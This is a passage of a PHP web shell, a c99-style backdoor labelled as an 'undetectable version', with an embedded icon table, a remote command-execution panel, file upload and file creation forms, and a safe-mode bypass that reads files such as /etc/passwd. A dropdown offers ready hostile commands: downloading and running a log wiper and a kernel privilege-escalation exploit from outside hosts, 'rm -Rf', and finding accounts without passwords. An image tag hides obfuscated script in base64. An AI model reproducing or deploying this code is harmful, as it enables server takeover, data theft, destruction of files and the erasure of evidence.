2861"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
2862"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
2863"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
2864"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2865"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2866"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2867"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2868"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2869"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2870"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
2871"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
2872"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
2873"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
2874"Ow==",
2875"ext_doc"=>
2876"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
2877"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
2878"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
2879"ext_exe"=>
2880"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
2881"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
2882"xhIAOw==",
2883"ext_h"=>
2884"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
2885"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
2886"Wq/NknbbSgAAOw==",
2887"ext_hpp"=>
2888"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
2889"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
2890"UqUagnbLdZa+YFcCADs=",
2891"ext_htaccess"=>
2892"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
2893"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
2894"AAA7",
2895"ext_html"=>
2896"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
2897"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
2898"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
2899"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
2900"ADs=",
2901"ext_jpg"=>
2902"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
2903"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
2904"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
2905"FxEAOw==",
2906"ext_js"=>
2907"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
2908"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
2909"a00AjYYBbc/o9HjNniUAADs=",
2910"ext_lnk"=>
2911"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
2912"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
2913"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
2914"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
2915"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
2916"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2917"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2918"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
2919"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
2920"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
2921"ADs=",
2922"ext_log"=>
2923"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
2924"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
2925"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
2926"ext_php"=>
2927"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
2928"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
2929"ext_pl"=>
2930"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
2931"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
2932"ext_swf"=>
2933"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
2934"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2935"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
2936"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
2937"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
2938"ext_tar"=>
2939"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
2940"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
2941"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
2942"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
2943"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2944"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2945"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2946"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
2947"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
2948"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
2949"u4tLAgEAOw==",
2950"ext_txt"=>
2951"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2952"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2953"UpPWG3Ig6Hq/XmRjuZwkAAA7",
2954"ext_wri"=>
2955"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
2956"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
2957"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
2958"ext_xml"=>
2959"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2960"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2961"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2962"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2963"IQA7"
2964 );
2965 //For simple size- and speed-optimization.
2966 $imgequals = array(
2967 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
2968 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
2969 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
2970 "ext_html"=>array("ext_html","ext_htm"),
2971 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
2972 "ext_lnk"=>array("ext_lnk","ext_url"),
2973 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
2974 "ext_doc"=>array("ext_doc","ext_dot"),
2975 "ext_js"=>array("ext_js","ext_vbs"),
2976 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
2977 "ext_wri"=>array("ext_wri","ext_rtf"),
2978 "ext_swf"=>array("ext_swf","ext_fla"),
2979 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
2980 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
2981 );
2982 if (!$getall)
2983 {
2984 header("Content-type: image/gif");
2985 header("Cache-control: public");
2986 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
2987 header("Cache-control: max-age=".(60*60*24*7));
2988 header("Last-Modified: ".date("r",filemtime(__FILE__)));
2989 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
2990 if (empty($images[$img])) {$img = "small_unk";}
2991 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
2992 echo base64_decode($images[$img]);
2993 }
2994 else
2995 {
2996 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
2997 natsort($images);
2998 $k = array_keys($images);
2999 echo "<center>";
3000 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
3001 echo "</center>";
3002 }
3003 exit;
3004}
3005if ($act == "about") {echo "<center>Undetectable version by <br> Spyk1r4 <br> </center>";}
3006?>
3007</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3008<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
3009<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
3010<br>
3011<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3012<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
3013<tr>
3014 <td width="50%" height="83" valign="top"><center>
3015 <div align="center">Useful Commands
3016 </div>
3017 <form action="<?php echo $surl; ?>">
3018 <div align="center">
3019 <input type=hidden name=act value="cmd">
3020 <input type=hidden name="d" value="<?php echo $dispd; ?>">
3021 <SELECT NAME="cmd">
3022 <OPTION VALUE="uname -a">Kernel version
3023 <OPTION VALUE="w">Logged in users
3024 <OPTION VALUE="lastlog">Last to connect
3025 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
3026 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
3027 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
3028 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
3029 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
3030 <OPTION VALUE="netstat -atup | grep IST">Open ports
3031 <OPTION VALUE="locate gcc">gcc installed?
3032 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
3033 <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
3034 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
3035 <OPTION VALUE="./zap2">WIPELOGS PT3
3036 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
3037 <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
3038 <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
3039 <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
3040 <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
3041 <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
3042 </SELECT>
3043 <input type=hidden name="cmd_txt" value="1">
3044 &nbsp;
3045 <input type=submit name=submit value="Execute">
3046 <br>
3047 Warning. Kernel may be alerted using higher levels </div>
3048 </form>
3049 </td>
3050 <td width="50%" height="83" valign="top"><center>
3051 <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
3052 <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
3053 <input type="hidden" name="client" value="firefox-a">
3054 <input type="hidden" name="rls" value="org.mozilla:en-US:official">
3055 <input type="hidden" name="hl" value="en">
3056 <input type="hidden" name="hs" value="b7p">
3057 <input type=submit name="btnG" VALUE="Search">
3058 </form></center>
3059 </td>
3060</tr></TABLE><br>
3061<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3062<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
3063<tr>
3064 <td width="50%" height="83" valign="top"><center>
3065 <div align="center">Php Safe-Mode Bypass (Read Files)
3066 </div><br>
3067 <form action="<?php echo $surl; ?>">
3068 <div align="center">
3069 File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
3070
3071
3072
3073
3074
3075
3076 <?
3077
3078 function rsg_read()
3079 {
3080 $test="";
3081 $temp=tempnam($test, "cx");
3082 $file=$_GET['file'];
3083 $get=htmlspecialchars($file);
3084 echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
3085 if(copy("compress.zlib://".$file, $temp)){
3086 $fichier = fopen($temp, "r");
3087 $action = fread($fichier, filesize($temp));
3088 fclose($fichier);
3089 $source=htmlspecialchars($action);
3090 echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
3091 unlink($temp);
3092 } else {
3093 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
3094 <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
3095 access.</CENTER></FONT>");
3096 }
3097 echo "</div>";
3098 }
3099
3100 if(isset($_GET['file']))
3101{
3102rsg_read();
3103}
3104
3105 ?>
3106
3107 <?
3108
3109 function rsg_glob()
3110{
3111$chemin=$_GET['directory'];
3112$files = glob("$chemin*");
3113echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
3114foreach ($files as $filename) {
3115 echo "<pre>";
3116 echo "$filename\n";
3117 echo "</pre>";
3118}
3119}
3120
3121if(isset($_GET['directory']))
3122{
3123rsg_glob();
3124}
3125
3126?>
3127
3128 <br>
3129 </div>
3130 </form>
3131 </td>
3132 <td width="50%" height="83" valign="top"><center>
3133 <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>">
3134 <div align="center"><br>
3135 Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
3136
3137 </form></center>
3138 </td>
3139</tr></TABLE><br>
3140<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
3141<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3142<tr>
3143 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
3144 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
3145</tr>
3146</table>
3147<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
3148<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
3149<script type="text/javascript">
3150if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var 